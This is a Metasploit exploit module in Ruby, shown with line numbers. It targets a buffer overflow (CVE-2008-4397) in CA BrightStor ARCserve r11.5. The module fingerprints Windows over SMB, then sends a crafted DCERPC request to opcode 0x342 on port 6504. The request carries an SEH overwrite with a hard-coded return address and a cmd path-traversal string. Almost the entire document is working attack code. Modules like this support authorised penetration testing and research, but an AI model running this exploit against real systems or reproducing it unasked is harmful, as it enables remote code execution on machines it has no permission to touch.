1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11
  include Msf::Exploit::Remote::Seh
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow',
18
        'Description' => %q{
19
          This module exploits a buffer overflow in Computer Associates BrightStor ARCserve r11.5 (build 3884).
20
          By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer
21
          and execute arbitrary code. In order to successfully exploit this vulnerability, you will need
22
          set the hostname argument (HNAME).
23
        },
24
        'Author' => [ 'Nahuel Cayento Riva', 'MC' ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          [ 'BID', '31684' ],
28
          [ 'OSVDB', '49468' ],
29
          [ 'CVE', '2008-4397' ],
30
          [ 'URL', 'http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html' ],
31
        ],
32
        'Privileged' => true,
33
        'DefaultOptions' => {
34
          'EXITFUNC' => 'thread',
35
        },
36
        'Payload' => {
37
          'Space' => 550,
38
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
39
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
40
        },
41
        'Platform' => 'win',
42
        'Targets' => [
43
          [ 'Computer Associates BrightStor ARCserve r11.5 (build 3884)', { 'Ret' => 0x2123bdf4 } ], # ASCORE.dll 11.5.3884.0
44
        ],
45
        'DisclosureDate' => '2008-10-09',
46
        'DefaultTarget' => 0,
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options(
56
      [
57
        OptString.new('HNAME', [ true, 'The NetBios hostname of the target.']),
58
        Opt::RPORT(6504)
59
      ]
60
    )
61
  end
62

63
  def fingerprint
64
    datastore['RPORT'] = 445
65
    os = smb_fingerprint()
66
    return os
67
  end
68

69
  def exploit
70
    path = fingerprint()
71

72
    if (path['os'] !~ /Windows/)
73
      print_error("Target not supported!")
74
      return
75
    elsif (path['os'] =~ /Windows 2000/)
76
      dir = "winnt"
77
      offset = 442
78
    else
79
      dir = "windows"
80
      offset = 436
81
    end
82

83
    print_status("Identified OS '#{path['os']}', setting appropiate system path...")
84

85
    datastore['RPORT'] = 6504
86

87
    connect()
88

89
    handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
90
    print_status("Binding to #{handle} ...")
91

92
    dcerpc_bind(handle)
93
    print_status("Bound to #{handle} ...")
94

95
    buffer = rand_text_alpha_upper(offset) + generate_seh_payload(target.ret)
96

97
    sploit = NDR.string("#{datastore['HNAME'].upcase}")
98
    sploit << NDR.string("..\\..\\..\\..\\..\\..\\..\\..\\..\\#{dir}\\system32\\cmd /c \"""\"""")
99
    sploit << NDR.string(buffer)
100
    sploit << NDR.string(rand_text_alpha_upper(20))
101
    sploit << NDR.long(2)
102
    sploit << NDR.long(2)
103
    sploit << NDR.string(rand_text_alpha_upper(20))
104
    sploit << NDR.long(0)
105
    sploit << NDR.long(4)
106

107
    print_status("Trying target #{target.name}...")
108

109
    begin
110
      dcerpc_call(342, sploit)
111
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
112
    end
113

114
    handler
115
    disconnect
116
  end
117
end
118

119